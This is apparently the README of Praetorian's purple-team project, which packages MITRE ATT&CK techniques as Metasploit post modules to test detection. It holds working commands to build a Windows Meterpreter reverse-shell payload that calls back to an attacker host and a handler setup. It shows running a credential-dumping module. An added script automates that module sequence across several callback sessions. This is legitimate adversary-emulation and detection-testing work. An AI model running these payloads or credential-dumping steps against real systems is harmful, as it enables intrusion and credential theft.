Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs
The Metasploit Framework is released under a BSD-style license. See
COPYING for more details.
At Praetorian, we were seeking a way to automatically emulate adversary tactics in order to evaluate detection and response capabilities. Our solution implements MITRE ATT&CK™ TTPs as Metasploit Framework post modules. As of this release, we’ve automated a little over 100 TTPs as modules.
Metasploit’s advantages are its robust library, its ability to interact with operating system APIs, and its flexible license. In addition, we are able to emulate features of other tools, such as in-memory .NET execution, by leveraging Metasploit’s execute_powershell functionality. This allows Blue Teams to ensure that their tools alert on the actual TTP behavior and not on execution artifacts (such as encoded PowerShell).
Our solution is built on top of the latest version of Metasploit as of 9 April 2019 (pulled from https://github.com/rapid7/metasploit-framework). We’ve made minor modifications to Metasploit’s code base to enable some of the automation. Everything should work as intended if you’re already familiar with Metasploit. The magic happens after you establish a Meterpreter session and run a TTP as a post-exploitation module.
We’re open sourcing our work because we believe in solving the cybersecurity problem. By giving Blue Teams more tools to emulate adversary behavior, we hope to improve their capabilities and reduce the still very high average dwell time.
For detailed operational usage guidance and a full list of modules and changes, please view the GitHub Wiki.
Quick start video guide: https://youtu.be/o3Qb_0clIpg
Installation should follow the instructions for installing a Metasploit Docker environment: https://github.com/rapid7/metasploit-framework/tree/master/docker
In general:
1. Clone the repository:
   git clone https://github.com/praetorian-code/purple-team-attack-automation.git
2. Edit ./docker-compose.local.override.yml to reflect the LHOST of your local system, similar to the example below. By default, port 4444 is forwarded to the Docker container. If you want to use other ports, for instance to mirror HTTPS, you will have to add them to this file:
   version: '3'
   services:
     ms:
       environment:
         # example of setting LHOST
         LHOST: 10.0.8.2
       # example of adding more ports
       ports:
         - 8080:8080
         - 443:443
3. Set LHOST to a valid hostname (or IP address) that resolves to your host machine.
4. Set the COMPOSE_FILE environment variable to load your local override:
   echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
5. Build the image:
   docker-compose build
6. Start the console:
   ./docker/bin/msfconsole
Generate an x64 Meterpreter payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Attacker IP Address> LPORT=4444 -f exe > meterpreter.exe
Start a handler in msfconsole. The handler's PAYLOAD must match the payload msfvenom built, here the x64 variant; a handler left at windows/meterpreter/reverse_tcp would send an x86 stage to the x64 stager and the session would not come up:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <Attacker IP Address>
set LPORT 4444
exploit -j -z
Copy meterpreter.exe to the target (“victim”) host, run it as an administrator, and wait for a session.
Run a TTP module against the session (here T1003, OS Credential Dumping):
use modules/post/windows/purple/t1003
info
set session 1
run
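As an added end-to-end example (it is not part of Praetorian's release or of Metasploit itself), the script below chains the steps above: it builds the x64 payload with msfvenom, writes a handler resource file whose PAYLOAD matches that stager, and attaches a multi_console_command list so that every Meterpreter session that calls back automatically runs a chosen sequence of purple modules, with the console transcript spooled to a log for comparison against the Blue Team's alerts. It assumes that multi_console_command accepts a -rc file of Meterpreter commands, that "run post/windows/purple/<name>" works from the Meterpreter prompt, and that any module name other than t1003 you pass actually exists in this project (check the Wiki's module list). Paths written into the resource files must be valid where msfconsole runs, which is inside the container for the Docker setup.

```shell
#!/bin/sh
# Added example, not part of the Praetorian project: automate one detection-
# validation run. It writes two msfconsole resource files (one for the handler,
# one holding the Meterpreter commands to run on every session that calls back)
# so several purple modules fire in sequence instead of being typed by hand.
# Assumptions not stated in this README: multi_console_command accepts
# "-rc <file>", "run post/<path>" works at the Meterpreter prompt, and each
# module name you pass exists under modules/post/windows/purple/ (only t1003
# is documented here).
set -eu

# Meterpreter command list for multi_console_command: record the victim
# context first (getuid, sysinfo), then run each TTP module in order. The
# spooled transcript gives you timestamps to line up against the SIEM.
write_session_rc() {
  out="$1"
  shift
  {
    printf 'getuid\n'
    printf 'sysinfo\n'
    for ttp in "$@"; do
      printf 'run post/windows/purple/%s\n' "$ttp"
    done
  } > "$out"
}

# Handler resource file. PAYLOAD matches the x64 stager msfvenom builds below;
# ExitOnSession false keeps the listener up for more than one victim;
# AutoRunScript runs the session command list on each new session; spool
# keeps a console transcript. Paths must be valid where msfconsole runs
# (inside the container if you use the Docker setup).
write_handler_rc() {
  out="$1"; lhost="$2"; lport="$3"; session_rc="$4"; log="$5"
  cat > "$out" <<EOF
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
set AutoRunScript multi_console_command -rc $session_rc
spool $log
exploit -j -z
EOF
}

# Usage: sh purple_run.sh --run <LHOST> <LPORT> [module ...]
# Builds the payload with a host msfvenom, writes both resource files under
# ./run and prints the next steps.
main() {
  lhost="$1"; lport="$2"; shift 2
  [ $# -gt 0 ] || set -- t1003   # default to the module this README demonstrates
  mkdir -p run
  write_session_rc run/session.rc "$@"
  write_handler_rc run/handler.rc "$lhost" "$lport" "$PWD/run/session.rc" "$PWD/run/purple-run.log"
  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST="$lhost" LPORT="$lport" -f exe -o run/meterpreter.exe
  echo "Start the handler:  msfconsole -q -r $PWD/run/handler.rc"
  echo "Then run run/meterpreter.exe as an administrator on the target; each session runs: $*"
}

if [ "${1:-}" = "--run" ]; then
  shift
  main "$@"
fi
```

Run it as sh purple_run.sh --run 10.0.8.2 4444 t1003 and start msfconsole with the printed -r argument. Because the handler keeps listening (ExitOnSession false), the same payload can be run on several hosts and each one replays the same TTP sequence, which makes it easy to confirm that a detection fires consistently rather than only on the first host.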
Praetorian recommends using the Metasploit nightly installers to run msfvenom when creating your payloads.
If docker-compose fails with:
ERROR: Couldn't connect to Docker daemon at http+docker://localunixsocket - is it running?
the Docker daemon is not running. Start it with:
service docker start
If you’re interested in our Purple Team services, please contact us online or read more about “Why Praetorian Benchmarks to MITRE ATT&CK™ and Why You Should Too”.
If you’re an engineer looking to join our great team, we have openings at our careers page.
See the Contribution Guide for a step-by-step guide to making a module.
Also, follow the Metasploit Framework’s general contributing guidelines.
We’d like to thank various members of the security community for providing a lot of the techniques and code that we integrated into this project.
At Praetorian, the following engineers helped contribute modules:
jabra [at] spl0it.org and @jabra